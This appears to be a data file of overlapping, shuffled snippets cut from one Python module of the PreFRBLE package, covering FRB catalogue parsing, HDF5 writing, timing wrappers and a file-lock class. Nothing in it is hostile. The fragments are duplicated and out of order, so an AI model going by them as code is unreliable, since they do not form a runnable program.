"fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex: if",
"containing values listed in FRBcat \"\"\" ### read all FRBs from FRBcat ###",
"wrapper to print the time needed to call function f \"\"\" t0 =",
"time() ret = f( *args, **kwargs ) t = time() - t0 print(",
"TODO It would be nice to avoid an arbitrary sleep here, but spinning",
"FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper to decode",
"path, timeout = None): self._path = path self._timeout = timeout self._fd = None",
"def decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read from",
"): \"\"\" wrapper to print the time needed to call function f \"\"\"",
"pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1 pass else:",
"[('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None,",
"temproal broadening print_number : boolean if True, print number of extractet FRBs Returns",
"time() res = func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0",
"100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO",
"#try: with h5.File( filename, 'a' ) as f: for data, key in zip(",
"from PreFRBLE.parameter import * from time import time def TimeElapsed( func, *args, **kwargs",
"sleep here, but spinning # without a delay is also undesirable. sleep(0.1) def",
"------- FRBs : array structured numpy.array containing values listed in FRBcat \"\"\" ###",
"*args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return res",
"time import sleep ## wrapper to write hdf5 files consistently def Write2h5( filename='',",
"RM tau : boolean if True, only return FRBs observed with temproal broadening",
"def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat,",
"key in zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass",
"FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\"",
"to decode byte-strings read from FRBcat \"\"\" if 'f' in dtype: if 'null'",
"to avoid an arbitrary sleep here, but spinning # without a delay is",
"print the time needed to call function f \"\"\" t0 = time() ret",
"telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) :",
"try: return next(x for x in iterable if condition(x)) except: return -1 ##",
"__exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the",
"the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\"",
"# unnecessary. This is mostly to help the user see whether a lock",
"time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import",
"with RM tau : boolean if True, only return FRBs observed with temproal",
"with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM':",
"] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ):",
"that tells whether the lock is active ## perform action on the locked",
"timeout = None): self._path = path self._timeout = timeout self._fd = None def",
"Use with caution, might corrupt nodes in your h5 file. in that case,",
"def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to compute function",
") as f: for data, key in zip( datas, keys ): try: f[key][()]",
"of FRB_dtype for row in reader: if telescopes and ( row[i_tele] not in",
"(1,2,3), condition=lambda x: x % 2 == 0) 2 >>> first(range(3, 100)) 3",
": boolean if True, only return FRBs observed with RM tau : boolean",
"keys in filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5",
"is str: sys.exit( 'Write2h5 needs list of datas and keys' ) ### small",
"write datas to keys in filename. overwrite existing entries \"\"\" if type(keys) is",
"until its left ## if file is locked, code is paused until lock",
"\"\"\" conveniently write datas to keys in filename. overwrite existing entries \"\"\" if",
"## flocker to keep parallel processes from writing to same file simultaneously ##",
"[('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all",
"by telescope with RM and tau ### print_number:True print number of extracted FRBs",
"measure time taken to compute function \"\"\" def MeasureTime(): t0 = time() res",
"number of extracted FRBs FRBs = [] with open( frbcat_file, 'r') as f:",
"header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele =",
"\"\"\" def MeasureTime(): t0 = time() res = func( *args, **kwargs) print( \"{}",
"= np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau,",
"lock file, but don't try too hard because it is # unnecessary. This",
"res return MeasureTime() from time import sleep ## wrapper to write hdf5 files",
"for data, key in zip( datas, keys ): try: f[key][()] f.__delitem__( key )",
"= np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0]",
"\"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes :",
"create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path",
"condition = lambda x: True): \"\"\" Returns the first item in the `iterable`",
"HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the time needed",
"t = time() - t0 print( \"Running %s took %i minutes and %.1f",
"= path self._timeout = timeout self._fd = None def __enter__(self): self._fd = os.open(self._path,",
"first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS",
"\"\"\" try: return next(x for x in iterable if condition(x)) except: return -1",
"f: reader = csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next())",
"# Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It",
"np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau",
"provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest",
"lock # exists by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE",
"errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not None and time()",
"f: for data, key in zip( datas, keys ): try: f[key][()] f.__delitem__( key",
"of considered telescopes, FRBs of other telescopes are ignored RM : boolean if",
"time import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken",
"): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break",
"'r') as f: reader = csv.reader( f ) header = np.array(next(reader)) # header",
"True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError)",
"func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return",
"*args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the lock",
"simplest possible interface to flock-based file locking. Intended for use with the `with`",
"in string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ):",
"is a temporary file that tells whether the lock is active ## perform",
"zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def",
"to print the time needed to call function f \"\"\" t0 = time()",
"mostly to help the user see whether a lock # exists by examining",
"tells whether the lock is active ## perform action on the locked file(s)",
"only those FRBs observed by telescope with RM and tau ### print_number:True print",
"read from FRBcat \"\"\" if 'f' in dtype: if 'null' in string: return",
"''' def first(iterable, condition = lambda x: True): \"\"\" Returns the first item",
"'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header",
"to flock-based file locking. Intended for use with the `with` syntax. It will",
"ignored RM : boolean if True, only return FRBs observed with RM tau",
"and keys' ) ### small workaround to allow for parallel computation. Use with",
"path self._timeout = timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT)",
"('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ):",
"only return FRBs observed with RM tau : boolean if True, only return",
"spinning # without a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd,",
"keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data )",
"type(keys) is str: sys.exit( 'Write2h5 needs list of datas and keys' ) ###",
"the first item of the iterable. Returns -1 if no item satysfing the",
"FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list of",
"row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau",
"(1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try:",
"''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the",
"a lock # exists by examining the filesystem. try: os.unlink(self._path) except: pass '''",
": continue if tau and ( row[i_tau] == 'null' ) : continue if",
"''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells",
") ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\"",
"keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype =",
"import * from time import time def TimeElapsed( func, *args, **kwargs ): \"\"\"",
"of extracted FRBs FRBs = [] with open( frbcat_file, 'r') as f: reader",
"def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read",
"the `condition`. If the condition is not given, returns the first item of",
"import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to",
"9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in",
"the condition is found. >>> first( (1,2,3), condition=lambda x: x % 2 ==",
"np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s",
"t0 = time() ret = f( *args, **kwargs ) t = time() -",
"measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read with GetFRBcat()",
"to help the user see whether a lock # exists by examining the",
"print_additional='', **kwargs ): \"\"\" wrapper to print the time needed to call function",
"active ## perform action on the locked file(s) ## file is locked when",
"only return FRBs observed with temproal broadening print_number : boolean if True, print",
") except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1",
"## wrapper to show time needed for some function ''' def HowLong( f,",
"str: sys.exit( 'Write2h5 needs list of datas and keys' ) ### small workaround",
"a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd",
"\"\"\"Provides the simplest possible interface to flock-based file locking. Intended for use with",
"self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO",
"x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for",
"other telescopes are ignored RM : boolean if True, only return FRBs observed",
"import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time",
"user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It would be nice",
"# Resource temporarily unavailable raise elif self._timeout is not None and time() >",
") return res return MeasureTime() from time import sleep ## wrapper to write",
"i_tele] ## order must fit order of FRB_dtype for row in reader: if",
"datas and keys' ) ### small workaround to allow for parallel computation. Use",
"## order must fit order of FRB_dtype for row in reader: if telescopes",
"file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock:",
"True, only return FRBs observed with RM tau : boolean if True, only",
"def MeasureTime(): t0 = time() res = func( *args, **kwargs) print( \"{} took",
"writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl,",
"x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x",
"measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker",
"filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys in filename. overwrite",
") ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U'",
"FRBs FRBs = [] with open( frbcat_file, 'r') as f: reader = csv.reader(",
"FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure",
"wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\"",
"Returns the first item in the `iterable` that satisfies the `condition`. If the",
"datas=[], keys=[] ): \"\"\" conveniently write datas to keys in filename. overwrite existing",
"time taken to compute function \"\"\" def MeasureTime(): t0 = time() res =",
"row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i,",
"time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to compute",
"MeasureTime() from time import sleep ## wrapper to write hdf5 files consistently def",
"f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1 pass else: print(",
"all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list",
"list of datas and keys' ) ### small workaround to allow for parallel",
"first( (1,2,3), condition=lambda x: x % 2 == 0) 2 >>> first(range(3, 100))",
"print number of extractet FRBs Returns ------- FRBs : array structured numpy.array containing",
"to frbcat_file Parameters ---------- telescopes : list list of considered telescopes, FRBs of",
"locked file(s) ## file is locked when with starts until its left ##",
"to call function f \"\"\" t0 = time() ret = f( *args, **kwargs",
"*args, **kwargs ) t = time() - t0 print( \"Running %s took %i",
": array structured numpy.array containing values listed in FRBcat \"\"\" ### read all",
"undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try",
"on the locked file(s) ## file is locked when with starts until its",
"import print_function import sys, h5py as h5, numpy as np, yt, csv from",
"iterable. Returns -1 if no item satysfing the condition is found. >>> first(",
"locked, code is paused until lock is released, then with is performed '''",
"( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for",
"function f \"\"\" t0 = time() ret = f( *args, **kwargs ) t",
"from FRBcat ### optional: read only those FRBs observed by telescope with RM",
"== 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to",
"first(iterable, condition = lambda x: True): \"\"\" Returns the first item in the",
"'f' in dtype: if 'null' in string: return float('NaN') return float(string) return string",
"if True, print number of extractet FRBs Returns ------- FRBs : array structured",
") ### small workaround to allow for parallel computation. Use with caution, might",
"except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file",
"found. >>> first( (1,2,3), condition=lambda x: x % 2 == 0) 2 >>>",
"TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to compute function \"\"\"",
"flock-based file locking. Intended for use with the `with` syntax. It will create/truncate/delete",
"condition=lambda x: x % 2 == 0) 2 >>> first(range(3, 100)) 3 >>>",
"reader = csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID",
"**kwargs ): \"\"\" measure time taken to compute function \"\"\" def MeasureTime(): t0",
"datas to keys in filename. overwrite existing entries \"\"\" if type(keys) is str:",
"(OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise",
"i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype",
"decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read from FRBcat",
"with is performed ''' def first(iterable, condition = lambda x: True): \"\"\" Returns",
"FRBs observed by telescope with RM and tau ### print_number:True print number of",
"decode byte-strings read from FRBcat \"\"\" if 'f' in dtype: if 'null' in",
"locking. Intended for use with the `with` syntax. It will create/truncate/delete the lock",
"FRBs['RM'] ## flocker to keep parallel processes from writing to same file simultaneously",
"then with is performed ''' def first(iterable, condition = lambda x: True): \"\"\"",
"necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path self._timeout = timeout",
"f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the time needed to",
"small workaround to allow for parallel computation. Use with caution, might corrupt nodes",
"the condition is not given, returns the first item of the iterable. Returns",
"and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype)",
")[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must",
"continue if tau and ( row[i_tau] == 'null' ) : continue if RM",
"('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in",
"string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\"",
"#FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None,",
"return -1 ## wrapper to show time needed for some function ''' def",
"those FRBs observed by telescope with RM and tau ### print_number:True print number",
"zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key,",
"= None # Try to remove the lock file, but don't try too",
"FRBs in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal']",
"= [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read",
"yt, csv from time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter",
"sleep(3e-2) tries += 1 pass else: print( \"couldn't write \", keys ) sys.exit(1)",
"None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try:",
"time needed to call function f \"\"\" t0 = time() ret = f(",
"in FRBcat \"\"\" ### read all FRBs from FRBcat ### optional: read only",
"that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try:",
"telescopes] ) : continue if tau and ( row[i_tau] == 'null' ) :",
"('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat(",
"function \"\"\" def MeasureTime(): t0 = time() res = func( *args, **kwargs) print(",
"the time needed to call function f \"\"\" t0 = time() ret =",
"if True, only return FRBs observed with RM tau : boolean if True,",
"for row in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for",
"else: print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype =",
"dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype",
"FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to keep parallel processes",
"by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible",
"https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with h5.File( filename, 'a'",
"perform action on the locked file(s) ## file is locked when with starts",
"is paused until lock is released, then with is performed ''' def first(iterable,",
"the user see whether a lock # exists by examining the filesystem. try:",
"FRBs = [] with open( frbcat_file, 'r') as f: reader = csv.reader( f",
"__future__ import print_function import sys, h5py as h5, numpy as np, yt, csv",
"Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys in filename.",
"conveniently write datas to keys in filename. overwrite existing entries \"\"\" if type(keys)",
"keep parallel processes from writing to same file simultaneously ## provided by derpston,",
"because it is # unnecessary. This is mostly to help the user see",
"read only those FRBs observed by telescope with RM and tau ### print_number:True",
"telescopes are ignored RM : boolean if True, only return FRBs observed with",
"file is locked, code is paused until lock is released, then with is",
"RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file",
"first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\"",
"header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau =",
"return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns",
"but don't try too hard because it is # unnecessary. This is mostly",
"it is # unnecessary. This is mostly to help the user see whether",
"SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells whether the lock",
"given, returns the first item of the iterable. Returns -1 if no item",
"= [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None,",
"condition is not given, returns the first item of the iterable. Returns -1",
"fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the lock file,",
"\"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'),",
"dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return",
"processes from writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import",
"## wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ):",
"('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs",
"FRBcat ### optional: read only those FRBs observed by telescope with RM and",
"t0 = time() res = func( *args, **kwargs) print( \"{} took {} s\".format(",
"\"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM']",
"will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout = None):",
"os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock",
"must fit order of FRB_dtype for row in reader: if telescopes and (",
"while tries < 30: #try: with h5.File( filename, 'a' ) as f: for",
"fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the lock file, but",
"string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\"",
"+= 1 pass else: print( \"couldn't write \", keys ) sys.exit(1) ## Read",
"read all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list",
"row in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele",
"for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array(",
"h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries",
"= np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0]",
"return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of",
"its left ## if file is locked, code is paused until lock is",
"item satysfing the condition is found. >>> first( (1,2,3), condition=lambda x: x %",
"call function f \"\"\" t0 = time() ret = f( *args, **kwargs )",
"the lock is active ## perform action on the locked file(s) ## file",
"and tau ### print_number:True print number of extracted FRBs FRBs = [] with",
"dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings",
"GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return",
"%i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) )",
"to compute function \"\"\" def MeasureTime(): t0 = time() res = func( *args,",
"== 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where(",
"= func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) )",
"temporary file that tells whether the lock is active ## perform action on",
"FRBs from FRBcat ### optional: read only those FRBs observed by telescope with",
"temporarily unavailable raise elif self._timeout is not None and time() > (start_lock_search +",
"the lock file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path =",
"for use with the `with` syntax. It will create/truncate/delete the lock file as",
"tau ### print_number:True print number of extracted FRBs FRBs = [] with open(",
"help the user see whether a lock # exists by examining the filesystem.",
"Lock acquired! return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: #",
"existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of datas",
"header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM =",
"tau and ( row[i_tau] == 'null' ) : continue if RM and (",
"'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order",
"float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures",
"None # Try to remove the lock file, but don't try too hard",
"lock is active ## perform action on the locked file(s) ## file is",
"= f( *args, **kwargs ) t = time() - t0 print( \"Running %s",
"the simplest possible interface to flock-based file locking. Intended for use with the",
"== 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where(",
"**kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return res return",
"if True, only return FRBs observed with temproal broadening print_number : boolean if",
"'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to keep",
"= os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB)",
"\"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of datas and keys'",
"needs list of datas and keys' ) ### small workaround to allow for",
"h5, numpy as np, yt, csv from time import time, sleep from PreFRBLE.file_system",
"`with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path,",
"x in iterable if condition(x)) except: return -1 ## wrapper to show time",
"-1 ## wrapper to show time needed for some function ''' def HowLong(",
"ret = f( *args, **kwargs ) t = time() - t0 print( \"Running",
"interface to flock-based file locking. Intended for use with the `with` syntax. It",
"USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells whether",
"f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2)",
"as f: reader = csv.reader( f ) header = np.array(next(reader)) # header =",
"is locked when with starts until its left ## if file is locked,",
"be nice to avoid an arbitrary sleep here, but spinning # without a",
"order of FRB_dtype for row in reader: if telescopes and ( row[i_tele] not",
"2): ## \"locktest\" is a temporary file that tells whether the lock is",
"when with starts until its left ## if file is locked, code is",
"files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to",
"in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list of considered",
"[i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of",
"by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2):",
"iterable if condition(x)) except: return -1 ## wrapper to show time needed for",
"sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'),",
"class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking. Intended for",
"nodes in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries =",
"def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the time",
"= [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order",
"frbcat_file Parameters ---------- telescopes : list list of considered telescopes, FRBs of other",
"= None): self._path = path self._timeout = timeout self._fd = None def __enter__(self):",
"write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write",
"unnecessary. This is mostly to help the user see whether a lock #",
"satisfies the `condition`. If the condition is not given, returns the first item",
"telescope with RM and tau ### print_number:True print number of extracted FRBs FRBs",
"to keep parallel processes from writing to same file simultaneously ## provided by",
"arbitrary sleep here, but spinning # without a delay is also undesirable. sleep(0.1)",
"and ( row[i_tau] == 'null' ) : continue if RM and ( row[i_RM]",
"see whether a lock # exists by examining the filesystem. try: os.unlink(self._path) except:",
"is locked, code is paused until lock is released, then with is performed",
"*args, print_additional='', **kwargs ): \"\"\" wrapper to print the time needed to call",
"file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries <",
"read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure ==",
"## file is locked when with starts until its left ## if file",
"[telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau and ( row[i_tau]",
"f( *args, **kwargs ) t = time() - t0 print( \"Running %s took",
"compute function \"\"\" def MeasureTime(): t0 = time() res = func( *args, **kwargs)",
